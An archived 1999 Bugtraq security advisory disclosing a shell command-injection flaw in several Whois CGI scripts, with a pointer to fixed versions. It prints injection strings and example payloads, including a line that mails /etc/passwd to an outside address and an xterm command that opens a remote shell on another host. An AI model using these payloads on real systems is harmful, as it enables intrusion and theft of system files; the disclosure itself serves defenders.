Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1999-q4

Bugtraq Archives: Whois.cgi - ADVISORY.

Whois.cgi - ADVISORY.

Subject: Whois.cgi - ADVISORY.
From: Cody T. - hhp (hhpHHP.PERLX.COM)
Date: Tue Nov 09 1999 - 20:51:58 CST

Next message: Hugo.van.der.KooijCAIW.NL: "Re: FTP denial of service attack"
Previous message: Phillip Susi: "Re: FTP denial of service attack"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

  (hhp) Whois.CGI - ADVISORY. (hhp)
              hhp-ADV#12
         11/9/99 8:42:57pm CST
             By: loophole
hhphhp.perlx.com - http://hhp.perlx.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
What?:
Hole in several known/unknown Whois CGI
packages.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Versions?:
1.) Whois Internic Lookup - version: 1.0
2.) CC Whois - Version: 1.0
3.) Matt's Whois - Version: 1

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit!:
These versions allow execution of commands
due to lack of shell escape character
parsing if the domain entries consist of
one of the following strings...
Note: (Strings will vary for different
vulnerable versions.)

1.) ;commands
2.) ";commands
3.) ;commands;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Example!:
If the domain entries consist of:
1.) ;id
2.) ";id
or either,
3.) ;id;
you will see something like this:
'Whois Server Version 1.1

Domain names in the .com, .net, and .org
domains can now be registered with many
different competing registrars. Go to
http://www.internic.net for detailed
information. etc. etc. etc....
(scroll to the bottom of the output.)
uid=501(blah) gid=500(blah)'
^^^^^\
` 'id' was executed on the server.

Other example commands can be ran also...
;xterm -display ip:0.0 -rv -e /bin/sh
";uname -a;whoami;w;ls -al
;cat /etc/passwd|mail youyourdomain.com;
Etc, Etc.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Foo!:
Alot of main *NIC* servers were found
running vulnerable versions. I am in the
process of contacting the main servers,
and the software programmers to advise the
vulnerability.

Very well known/used sites are
vulnerable (Which will rename nameless for
security reasons). I tried to get in
contact with them, but being such a big
company/service, I failed, so sad indeed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Fix?:
If you run one of these bad scripts,
delete it and point your browser to:
http://cgi.resourceindex.com/Programs_and_
Scripts/Perl/Internet_Utilities/Whois/
and download one of the secure packages.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Shouts to all of hhp.
Fuck you to gH for trying to rip this ADV
before I could release it.
---hhp-2t0--------------------------------

Next message: Hugo.van.der.KooijCAIW.NL: "Re: FTP denial of service attack"
Previous message: Phillip Susi: "Re: FTP denial of service attack"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b27 : Fri Dec 10 1999 - 12:07:16 CST